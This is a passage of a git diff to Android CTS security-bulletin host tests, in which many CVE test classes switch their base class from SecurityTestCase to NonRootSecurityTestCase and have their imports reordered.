import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.compatibility.common.util.CrashUtils;
-import static org.junit.Assume.assumeFalse;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2016_2182 extends SecurityTestCase {
+public class CVE_2016_2182 extends NonRootSecurityTestCase {
/**
* b/32096880
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
index 462864bf719..21057e216ab 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2016_8332 extends SecurityTestCase {
+public class CVE_2016_8332 extends NonRootSecurityTestCase {
/**
* b/37761553
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
index 02675513dc3..91766f8ee06 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java
@@ -15,13 +15,17 @@
*/
package android.security.cts;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2017_0684 extends SecurityTestCase {
+public class CVE_2017_0684 extends NonRootSecurityTestCase {
/**
* b/35421151
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
index 4f08b711fda..397078d08ff 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java
@@ -15,13 +15,17 @@
*/
package android.security.cts;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2017_0726 extends SecurityTestCase {
+public class CVE_2017_0726 extends NonRootSecurityTestCase {
/**
* b/36389123
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
index 62c72f2067e..bd69afb4e57 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java
@@ -15,16 +15,20 @@
*/
package android.security.cts;
-import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import static org.junit.Assert.*;
import static org.junit.Assume.*;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2017_13194 extends SecurityTestCase {
+public class CVE_2017_13194 extends NonRootSecurityTestCase {
/**
* b/64710201
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9410.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9410.java
index 0990cd448ec..f67c556e4df 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9410.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9410.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9410 extends SecurityTestCase {
+public class CVE_2018_9410 extends NonRootSecurityTestCase {
/**
* b/77822336
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9537.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9537.java
index df360d0d1d0..d58b3c39991 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9537.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9537.java
@@ -17,13 +17,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
+
import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9537 extends SecurityTestCase {
+public class CVE_2018_9537 extends NonRootSecurityTestCase {
/**
* b/112891564
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
index 1bb5e0a4679..f4a91b43485 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9547.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9547 extends SecurityTestCase {
+public class CVE_2018_9547 extends NonRootSecurityTestCase {
/**
* b/114223584
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9549.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9549.java
index bf2b0d1d3f9..1db523b4d1a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9549.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9549.java
@@ -17,13 +17,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
+
import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9549 extends SecurityTestCase {
+public class CVE_2018_9549 extends NonRootSecurityTestCase {
/**
* b/112160868
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
index b127c851d70..257d5784521 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
@@ -21,15 +21,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9558 extends SecurityTestCase {
+public class CVE_2018_9558 extends NonRootSecurityTestCase {
/**
* b/112161557
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
index ceeb117a52b..d8027c08248 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9561 extends SecurityTestCase {
+public class CVE_2018_9561 extends NonRootSecurityTestCase {
/**
* b/111660010
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
index 09d391ed758..22f1c97aa3d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9563 extends SecurityTestCase {
+public class CVE_2018_9563 extends NonRootSecurityTestCase {
/**
* b/114237888
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
index 6e4d588205a..cafea318d8c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9564.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9564 extends SecurityTestCase {
+public class CVE_2018_9564 extends NonRootSecurityTestCase {
/**
* b/114238578
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
index ab18f52e21f..02c470b6a7d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.tradefed.device.ITestDevice;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9584 extends SecurityTestCase {
+public class CVE_2018_9584 extends NonRootSecurityTestCase {
/**
* b/114047681
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
index 4f3a3bf1e66..8c24f9d51bf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.tradefed.device.ITestDevice;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9585 extends SecurityTestCase {
+public class CVE_2018_9585 extends NonRootSecurityTestCase {
/**
* b/117554809
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
index e899b7ae9e9..fb300c4b9bd 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9593.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9593 extends SecurityTestCase {
+public class CVE_2018_9593 extends NonRootSecurityTestCase {
/**
* b/116722267
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
index d6e8fb59c0e..d196681d95b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9594.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2018_9594 extends SecurityTestCase {
+public class CVE_2018_9594 extends NonRootSecurityTestCase {
/**
* b/116791157
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
index 826db694646..6f4c33bfcdd 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2007 extends SecurityTestCase {
+public class CVE_2019_2007 extends NonRootSecurityTestCase {
/**
* b/120789744
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2011.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2011.java
index 373703e3171..9fe5cb4ff8f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2011.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2011.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.tradefed.device.ITestDevice;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2011 extends SecurityTestCase {
+public class CVE_2019_2011 extends NonRootSecurityTestCase {
/**
* b/120084106
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2012.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2012.java
index 181d660df48..1b4a4a7d364 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2012.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2012.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2012 extends SecurityTestCase {
+public class CVE_2019_2012 extends NonRootSecurityTestCase {
/**
* b/120497437
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
index 0ac72b2b52a..caaa463ab32 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.tradefed.device.ITestDevice;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2013 extends SecurityTestCase {
+public class CVE_2019_2013 extends NonRootSecurityTestCase {
/**
* b/120497583
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
index e6863ac86a7..b54d767a91b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
@@ -17,13 +17,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2014 extends SecurityTestCase {
+public class CVE_2019_2014 extends NonRootSecurityTestCase {
/**
* b/120499324
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2015.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2015.java
index 1a798c2199e..bf46c60e611 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2015.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2015.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2015 extends SecurityTestCase {
+public class CVE_2019_2015 extends NonRootSecurityTestCase {
/**
* b/120503926
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2017.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2017.java
index b7c2ea8fab3..b1a1b54581f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2017.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2017.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2017 extends SecurityTestCase {
+public class CVE_2019_2017 extends NonRootSecurityTestCase {
/**
* b/121035711
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
index 1c5a180e64e..448611fbb4e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2019 extends SecurityTestCase {
+public class CVE_2019_2019 extends NonRootSecurityTestCase {
/**
* b/115635871
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2020.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2020.java
index b65faeef587..9ea384649f9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2020.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2020.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2020 extends SecurityTestCase {
+public class CVE_2019_2020 extends NonRootSecurityTestCase {
/**
* b/116788646
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2021.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2021.java
index 8d0d4d65909..b2fd563b5fd 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2021.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2021.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2021 extends SecurityTestCase {
+public class CVE_2019_2021 extends NonRootSecurityTestCase {
/**
* b/120428041
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2022.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2022.java
index 057e937e868..e60f0ba8918 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2022.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2022.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2022 extends SecurityTestCase {
+public class CVE_2019_2022 extends NonRootSecurityTestCase {
/**
* b/120506143
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2027.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2027.java
index df6c6f4b6b2..ad289bf43b9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2027.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2027.java
@@ -17,13 +17,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import org.junit.runner.RunWith;
+
import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2027 extends SecurityTestCase {
+public class CVE_2019_2027 extends NonRootSecurityTestCase {
/**
* b/119120561
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2031.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2031.java
index 21b22856fcc..dc941865c22 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2031.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2031.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2031 extends SecurityTestCase {
+public class CVE_2019_2031 extends NonRootSecurityTestCase {
/**
* b/120502559
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
index 8757455e954..a6435617a6a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2035 extends SecurityTestCase {
+public class CVE_2019_2035 extends NonRootSecurityTestCase {
/**
* b/122320256
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2038.java
index 4fe01646da1..46c0eb4b7e8 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2038.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2038.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2038 extends SecurityTestCase {
+public class CVE_2019_2038 extends NonRootSecurityTestCase {
/**
* b/121259048
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2039.java
index 63903409371..f411ae1bcd2 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2039.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2039.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2039 extends SecurityTestCase {
+public class CVE_2019_2039 extends NonRootSecurityTestCase {
/**
* b/121260197
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
index 6c6d2394329..062248a931d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2040 extends SecurityTestCase {
+public class CVE_2019_2040 extends NonRootSecurityTestCase {
/**
* b/122316913
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
